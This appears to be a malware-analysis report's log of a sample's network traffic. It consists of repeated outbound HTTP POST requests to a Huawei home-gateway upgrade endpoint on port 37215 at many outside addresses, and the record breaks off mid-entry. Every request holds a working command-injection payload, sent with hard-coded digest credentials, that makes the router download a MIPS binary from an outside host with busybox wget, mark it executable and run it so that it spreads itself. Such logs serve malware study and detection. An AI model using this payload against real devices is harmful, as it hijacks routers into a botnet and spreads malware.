                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          903192.168.2.1557684172.127.142.18337215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:55.685462952 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          904192.168.2.154892241.196.95.2637215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:55.685583115 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          905192.168.2.153708041.27.249.1237215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:55.685636997 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          906192.168.2.155953441.248.15.12237215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:55.685683012 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          907192.168.2.153811841.85.48.4837215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:55.685745001 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          908192.168.2.1551946157.7.191.20937215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:56.707456112 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          909192.168.2.153627641.105.229.10937215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:56.707511902 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          910192.168.2.1545336197.121.137.11537215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:56.707511902 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          911192.168.2.1535968197.109.136.7537215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:56.707561970 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          912192.168.2.1551096157.87.133.5337215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:56.707561970 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 